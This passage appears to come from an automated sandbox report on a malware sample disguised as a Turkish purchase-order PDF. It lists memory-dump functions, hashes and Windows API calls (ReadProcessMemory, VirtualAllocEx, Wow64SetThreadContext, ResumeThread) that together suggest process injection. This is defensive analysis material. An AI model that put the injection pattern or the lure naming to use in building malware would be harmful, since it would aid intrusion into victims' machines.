                                • Opcode Fuzzy Hash: c59255b4de98369263b956b668480a3dfc1f8a36816f2be65e5725e6159ad707
                                • Instruction Fuzzy Hash: 0B2164B19003099FDF00CFAAC981BEEBBF5FF48310F10842AE959A7240C7789944CBA4
                                Function 0271D2F8 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 270 271d2f8-271d2fe 271 271d300-271d394 DuplicateHandle 270->271 272 271d396-271d39c 271->272 273 271d39d-271d3ba 271->273 272->273
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0271D387
                                Memory Dump Source
                                • Source File: 00000005.00000002.1320031802.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2710000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: cd4aa0d424ab5c95d30236875480efdc4f23b31b5c704268e5a37c164c24cdb7
                                • Instruction ID: 6f8ba8be94823027c39f051ed9a36736218968443f54d66abcd6dc9e8a61edac
                                • Opcode Fuzzy Hash: cd4aa0d424ab5c95d30236875480efdc4f23b31b5c704268e5a37c164c24cdb7
                                • Instruction Fuzzy Hash: D82103B5900248DFDB10CFAAD584ADEBBF5EF48320F14846AE958A3310D374A954CFA5
                                Function 05E96518 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 294 5e96518-5e965a5 ReadProcessMemory 297 5e965ae-5e965de 294->297 298 5e965a7-5e965ad 294->298 298->297
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05E96598
                                Memory Dump Source
                                • Source File: 00000005.00000002.1329063984.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5e90000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: c8bd62ad3988c99c5645015e494c6092b26208e5a94c084d337357cf4d3d0db4
                                • Instruction ID: 2686f3cd28b921b49984c04a845073d8e266b175f059870829fe5604ce822d44
                                • Opcode Fuzzy Hash: c8bd62ad3988c99c5645015e494c6092b26208e5a94c084d337357cf4d3d0db4
                                • Instruction Fuzzy Hash: 872116B18003499FDF10DFAAC881BEEBBF5FF48310F50842AE959A7240C7749541CBA4
                                Function 05E96510 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 286 5e96510-5e965a5 ReadProcessMemory 289 5e965ae-5e965de 286->289 290 5e965a7-5e965ad 286->290 290->289
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05E96598
                                Memory Dump Source
                                • Source File: 00000005.00000002.1329063984.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5e90000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: 5bed5125050bb1390492cd879d394f4e30803ce545f458a3e006767a27ec159a
                                • Instruction ID: d6a496b864d429bed2045e11985a0ef03ccdc635917ecb22575e6b5b37ae7ded
                                • Opcode Fuzzy Hash: 5bed5125050bb1390492cd879d394f4e30803ce545f458a3e006767a27ec159a
                                • Instruction Fuzzy Hash: 3C2134B18003599FDF00CFAAC9817EEBBF1FF48310F54882AE959A7240C7789941CBA4
                                Function 05E95E58 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 276 5e95e58-5e95ea3 278 5e95eb3-5e95ee3 Wow64SetThreadContext 276->278 279 5e95ea5-5e95eb1 276->279 281 5e95eec-5e95f1c 278->281 282 5e95ee5-5e95eeb 278->282 279->278 282->281
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05E95ED6
                                Memory Dump Source
                                • Source File: 00000005.00000002.1329063984.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5e90000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 5dba208c41018200f42412c395d469de92be794d199bde915906c635491a8597
                                • Instruction ID: cb3a1889998e4940adfda86b9e0cfd303ab1d732381f110de082b20e937d52d7
                                • Opcode Fuzzy Hash: 5dba208c41018200f42412c395d469de92be794d199bde915906c635491a8597
                                • Instruction Fuzzy Hash: 972135B19043088FDB14DFAAC4857EEBBF4EF48314F54842ED899A7241CB789945CFA4
                                Function 05E95E50 Relevance: 1.6, APIs: 1, Instructions: 62threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 307 5e95e50-5e95ea3 309 5e95eb3-5e95ee3 Wow64SetThreadContext 307->309 310 5e95ea5-5e95eb1 307->310 312 5e95eec-5e95f1c 309->312 313 5e95ee5-5e95eeb 309->313 310->309 313->312
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05E95ED6
                                Memory Dump Source
                                • Source File: 00000005.00000002.1329063984.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5e90000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: d2d3431be085eab38f302c4b7686e4cf8c18a9392a96f22cb686023527565cd1
                                • Instruction ID: 68e7dff50e812987af32ce7671b1410d6aac6c2c044506bcd026cc09c6c0a878
                                • Opcode Fuzzy Hash: d2d3431be085eab38f302c4b7686e4cf8c18a9392a96f22cb686023527565cd1
                                • Instruction Fuzzy Hash: 302145B1D003088FEB14CFAAC5857EEBBF4AF48314F14842AD599A7241D7B89544CFA0
                                Function 0271D300 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 302 271d300-271d394 DuplicateHandle 303 271d396-271d39c 302->303 304 271d39d-271d3ba 302->304 303->304
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0271D387
                                Memory Dump Source
                                • Source File: 00000005.00000002.1320031802.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2710000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 104bdaa6f5617b149d706b8c6fea849bb0949ea8ce91a60f8db5de7308baf0d9
                                • Instruction ID: cf9a2daa62bdd4c4c610fd49671b02d6b941bfa0eb8477320643bffa54475bee
                                • Opcode Fuzzy Hash: 104bdaa6f5617b149d706b8c6fea849bb0949ea8ce91a60f8db5de7308baf0d9
                                • Instruction Fuzzy Hash: 5521E2B5900248DFDB10CFAAD984ADEFBF9EF48310F14802AE958A3350D374A954CFA5
                                Function 05E96360 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05E963D6
                                Memory Dump Source
                                • Source File: 00000005.00000002.1329063984.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5e90000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: babf56325e13782c6bd27a6c4d19e26d2ccfc5e53807ca6a026be65b73e6c622
                                • Instruction ID: 300f69d8a869899fe16799e8e8d9984240d4adfc01d64935d5c987f43eb0b2ab
                                • Opcode Fuzzy Hash: babf56325e13782c6bd27a6c4d19e26d2ccfc5e53807ca6a026be65b73e6c622
                                • Instruction Fuzzy Hash: C51197728003089FDF10CFAAC845BEEBBF5EF88320F14842AE955A7250C775A540CFA4
                                Function 0271A870 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0271B101,00000800,00000000,00000000), ref: 0271B312
                                Memory Dump Source
                                • Source File: 00000005.00000002.1320031802.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2710000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID:
                                • API String ID: 1029625771-0
                                • Opcode ID: 0c7682e0eb7d8415ef7ce732f8fed3693fabf07420a733df69aec22a2a69a819
                                • Instruction ID: fb496ffba03be9e28f4984f1a6b8e80f46555aa71c217362d2388718403b0880
                                • Opcode Fuzzy Hash: 0c7682e0eb7d8415ef7ce732f8fed3693fabf07420a733df69aec22a2a69a819
                                • Instruction Fuzzy Hash: E51100B69003489FDB10CF9AD444AAEFBF4EF88314F10846AE859A7200C3B5A545CFA5
                                Function 0271B2A1 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0271B101,00000800,00000000,00000000), ref: 0271B312
                                Memory Dump Source
                                • Source File: 00000005.00000002.1320031802.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2710000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID:
                                • API String ID: 1029625771-0
                                • Opcode ID: eceba01adc19438f5f5d39cef5da3944bdcb22ede3c84e5734b063f3e02ece83
                                • Instruction ID: 77d05fd881df380323c80a54b98f820e4fb9f77b872ab737d05c0e8864f98b4b
                                • Opcode Fuzzy Hash: eceba01adc19438f5f5d39cef5da3944bdcb22ede3c84e5734b063f3e02ece83
                                • Instruction Fuzzy Hash: 241103B69002488FDB10CFAAC444ADEFBF4EF88314F14846ED859A7200C375A549CFA5
                                Function 05E96368 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05E963D6
                                Memory Dump Source
                                • Source File: 00000005.00000002.1329063984.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5e90000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 7b9463d5bae3327a52fa912b3027ab8b97010bcf1c92d68d979e857d5b22601d
                                • Instruction ID: 307286183eb888a83ced84c32a311a6392714dd571ef26d5949555c418de4a2e
                                • Opcode Fuzzy Hash: 7b9463d5bae3327a52fa912b3027ab8b97010bcf1c92d68d979e857d5b22601d
                                • Instruction Fuzzy Hash: 0F1134718003489FDF10DFAAC845BEEBBF5EF88320F14842AE959A7250C775A940CFA4
                                Function 05E95DA0 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1329063984.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5e90000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 0a5fadacc3c52ad32ec6414478e9f262ba94576f45adf9c9fbd04b96411c9087
                                • Instruction ID: bd6941450189e9db93c69d6fe0a570cf8e0b6846d26fc40e0c6758b4ef976196
                                • Opcode Fuzzy Hash: 0a5fadacc3c52ad32ec6414478e9f262ba94576f45adf9c9fbd04b96411c9087
                                • Instruction Fuzzy Hash: 051158B18043488FDB20DFAAC4457EEFBF5EF88314F14842ED459A7240CB75A944CBA4
                                Function 05E95DA8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1329063984.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5e90000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 5360cf9d788f5afb2bfc8c1d6bea7b4c763b776128378785089a51b1c8919845
                                • Instruction ID: 372b203aa3e2cb507adf01d986fb278e9d0cd566ae07e3fa24f184f7e658de9f
                                • Opcode Fuzzy Hash: 5360cf9d788f5afb2bfc8c1d6bea7b4c763b776128378785089a51b1c8919845
                                • Instruction Fuzzy Hash: 1A1136B19043488FDB24DFAAC4457EEFBF5EF88324F24842ED559A7240CB75A944CBA4
                                Function 05E97D78 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                Download Yara Rule
                                APIs
                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 05E99BC5
                                Memory Dump Source
                                • Source File: 00000005.00000002.1329063984.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5e90000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID:
                                • API String ID: 410705778-0
                                • Opcode ID: d2b4c964b6138d24c4eff3c8b15bb1b7058bf4c74dc66b7b32cdd60da6cde30d
                                • Instruction ID: e9958f6dc9f1d2abc4043b86e4aa056b540f415f8dc4fa37b2d510ec406e5ce1
                                • Opcode Fuzzy Hash: d2b4c964b6138d24c4eff3c8b15bb1b7058bf4c74dc66b7b32cdd60da6cde30d
                                • Instruction Fuzzy Hash: 1F1103B5804748DFDB10CF9AC485BDEFBF8EB48324F108419E999A7201D379A944CFA5
                                Function 05E99B60 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                Download Yara Rule
                                APIs
                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 05E99BC5
                                Memory Dump Source
                                • Source File: 00000005.00000002.1329063984.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5e90000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID:
                                • API String ID: 410705778-0
                                • Opcode ID: 6c3c6e2df527dc66f7c808a4badc0c5c5b70f555df53c3577aeb3cc7907bb42e
                                • Instruction ID: 33f290b1aa26c5af0835920bbb608a6b57c469b7e599e776afafeacc0216bf08
                                • Opcode Fuzzy Hash: 6c3c6e2df527dc66f7c808a4badc0c5c5b70f555df53c3577aeb3cc7907bb42e
                                • Instruction Fuzzy Hash: C611F5B5800348DFDB10CF9AC985BDEBBF8EB48310F108459E954A7240D375A544CFA5
                                Function 0271B020 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0271B086
                                Memory Dump Source
                                • Source File: 00000005.00000002.1320031802.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2710000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: 0bd2c1bd8a35109db85fbcb00175e1d8452d5036a4d2165875177a1beb5e9d7e
                                • Instruction ID: 04961410bc674c4ea6683a6338826f9b8bff5d2551cc2e8c6e4a606f894727c4
                                • Opcode Fuzzy Hash: 0bd2c1bd8a35109db85fbcb00175e1d8452d5036a4d2165875177a1beb5e9d7e
                                • Instruction Fuzzy Hash: BE11FDB5C007498FCB20CF9AC444A9EFBF4AF88314F10842AD869A7210C375A645CFA1
                                Function 00D1D3D8 Relevance: .1, Instructions: 75COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.1319169308.0000000000D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D1D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_d1d000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b93ac1b5f121dfe75ae1ae6fb9f2237840ee8e047e6cfdf994df8d5e62c81e30
                                • Instruction ID: 85fca56e51709e029536614f9b5c9b4fb382f3ff54ba560fcd058bce65e31a8b
                                • Opcode Fuzzy Hash: b93ac1b5f121dfe75ae1ae6fb9f2237840ee8e047e6cfdf994df8d5e62c81e30
                                • Instruction Fuzzy Hash: 48213A71504304EFDB04DF50E9C0B56BB66FB98314F24C56DE8490B256C736E896CBB2
                                Function 00D1D4C4 Relevance: .1, Instructions: 75COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.1319169308.0000000000D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D1D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_d1d000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 19151c48d03e1d30f763cbf396c31fafd5c1509d71a034396f9d5d4781889b73
                                • Instruction ID: b5435f37412f100e693de97fe82c7c20e9aaf3c12e7c8dc4c76d4664dff1b301
                                • Opcode Fuzzy Hash: 19151c48d03e1d30f763cbf396c31fafd5c1509d71a034396f9d5d4781889b73
                                • Instruction Fuzzy Hash: 632145B1504200EFEB04DF10E8C0B66BF63FB88318F24C169E8490B256C736D896CBB2
                                Function 00D2D1D4 Relevance: .1, Instructions: 72COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.1319273370.0000000000D2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D2D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_d2d000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6ae8df1aded2710eeb991f11bc71b3c489481513af722d4b5546cc047bf87246
                                • Instruction ID: e63a4ec7c1b0699e13168306a336de166b0c2459d499708fd3702fcbd56962d2
                                • Opcode Fuzzy Hash: 6ae8df1aded2710eeb991f11bc71b3c489481513af722d4b5546cc047bf87246
                                • Instruction Fuzzy Hash: 2021D071504200EFDB05DF50E980B26BBA6FFA8318F34C5ADE8494B292C736D856CA75
                                Function 00D2D01C Relevance: .1, Instructions: 72COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.1319273370.0000000000D2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D2D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_d2d000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 63ca4cdbc3c4e18d7da2dfe2279d8eb2dc1d3a80a770c1d22c2ce7c85f4ec626
                                • Instruction ID: ef93d51f771100343ebc5bbe1752bf0385186c413f1a937624461b5d5ddec386
                                • Opcode Fuzzy Hash: 63ca4cdbc3c4e18d7da2dfe2279d8eb2dc1d3a80a770c1d22c2ce7c85f4ec626
                                • Instruction Fuzzy Hash: 9521F571504340DFDB14DF10E684B16BB66EB94318F24C56DD8494B2A6C736D857CA71
                                Function 00D2D005 Relevance: .1, Instructions: 62COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.1319273370.0000000000D2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D2D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_d2d000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 11c580b599f82089ede359f3dd02e6c03b61dff6eaeac318a0044c4e73af0426
                                • Instruction ID: ca157e1b6811129626cbdb9b0cfad1343dbd5a75239046128848d8ca2abad96f
                                • Opcode Fuzzy Hash: 11c580b599f82089ede359f3dd02e6c03b61dff6eaeac318a0044c4e73af0426
                                • Instruction Fuzzy Hash: E32165755093C08FC712CF24D594715BF72EB56314F28C5EAD8498F6A7C33A984ACB62
                                Function 00D1D3D3 Relevance: .1, Instructions: 56COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.1319169308.0000000000D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D1D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_d1d000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
                                • Instruction ID: 150fe3c2cb4e35dbe6ccc83c6178ee71caa1ea5ad219317ed0a098bf8e87625e
                                • Opcode Fuzzy Hash: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
                                • Instruction Fuzzy Hash: 8B11E676504240DFCB15CF10D5C4B56BF72FB94324F28C6A9D8490B657C33AE89ACBA1
                                Function 00D1D4BF Relevance: .1, Instructions: 56COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.1319169308.0000000000D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D1D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_d1d000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
                                • Instruction ID: 835f630763faebf919f7dd5d1642ae23f6969fab1283e2b160e7ec564c1c2f14
                                • Opcode Fuzzy Hash: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
                                • Instruction Fuzzy Hash: E611D376504280DFDB15CF10D5C4B56BF72FB94318F28C6A9D8490B656C336D89ACBA1
                                Function 00D2D1CF Relevance: .1, Instructions: 53COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.1319273370.0000000000D2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D2D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_d2d000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 04b342587f02f4df216fd9fa4589941a60fabf0b5787ec5e4e812599987ae7f8
                                • Instruction ID: db683c020b35dac926ece91f34a940f8862b6a73b47f93e402f12981e896c256
                                • Opcode Fuzzy Hash: 04b342587f02f4df216fd9fa4589941a60fabf0b5787ec5e4e812599987ae7f8
                                • Instruction Fuzzy Hash: 76118B75504280DFDB15CF10D5C4B15BBA2FF94318F28C6A9D8494B696C33AD84ACB61

                                Non-executed Functions

                                Function 05E9B6B8 Relevance: .4, Instructions: 353COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.1329063984.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5e90000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bd7b7d9edfb9e14014715dfc537beb5119245624f0ae1a4130c494eabc38cfb4
                                • Instruction ID: 37ff181f882e6b07f8c61cb7fe15338f3dc6702774e74e2225ad4ffdcd66eae8
                                • Opcode Fuzzy Hash: bd7b7d9edfb9e14014715dfc537beb5119245624f0ae1a4130c494eabc38cfb4
                                • Instruction Fuzzy Hash: 4CD1AB71B093048BEB2ADB7AE454BAE77FBAF88304F10846DD5869B290DF34D901CB51
                                Function 05E95580 Relevance: .3, Instructions: 312COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.1329063984.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5e90000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 928a7b8b8e8eb7754e6d1a4f78904b50c30ba1199d901f931b1bb947b992e770
                                • Instruction ID: c182baa1bf698afa766586cc8b0693518b63d618eade20ffbb8d6e4419ea2d9f
                                • Opcode Fuzzy Hash: 928a7b8b8e8eb7754e6d1a4f78904b50c30ba1199d901f931b1bb947b992e770
                                • Instruction Fuzzy Hash: E2E1E774E042198FDB18DFA9C580AAEBBF2BF89305F24C16AD455AB355D730AD42CF60
                                Function 05E95F30 Relevance: .3, Instructions: 312COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.1329063984.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5e90000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 94c34c2ee9b0c738dfea678fb6a50a301db210e80e2945879fa231015b320d5a
                                • Instruction ID: bdac55b557840b13768d6cbb03a3e63558a9b3af14aadc228afcee2490ef0d3e
                                • Opcode Fuzzy Hash: 94c34c2ee9b0c738dfea678fb6a50a301db210e80e2945879fa231015b320d5a
                                • Instruction Fuzzy Hash: 6BE1E674E042198FDB18DFA9C580AAEFBB2BF89305F24C16AD455AB355D730AD42CF60
                                Function 05E93EA8 Relevance: .3, Instructions: 312COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.1329063984.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5e90000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 32b82e084fa32e9f6acc880bdba13955d80451287ae1a2e2b1da60f5088c9b9e
                                • Instruction ID: fe06907603d4dce9542d7a330ab6b3dac36f85546239950d623b500a63741085
                                • Opcode Fuzzy Hash: 32b82e084fa32e9f6acc880bdba13955d80451287ae1a2e2b1da60f5088c9b9e
                                • Instruction Fuzzy Hash: 3AE1E674E002198FDB18DFA9C580AAEFBB2BF89305F24C169D854AB355D731AD42CF61
                                Function 05E95148 Relevance: .3, Instructions: 312COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.1329063984.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5e90000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1741e15392c03ef73664fe2b1505097fc12a61ef3f0a322ebf56d908a160f1c6
                                • Instruction ID: 66a39ca0e91d59ceba32ca8532246e86822865fcf83ccc6f31ef9ebb3d82e915
                                • Opcode Fuzzy Hash: 1741e15392c03ef73664fe2b1505097fc12a61ef3f0a322ebf56d908a160f1c6
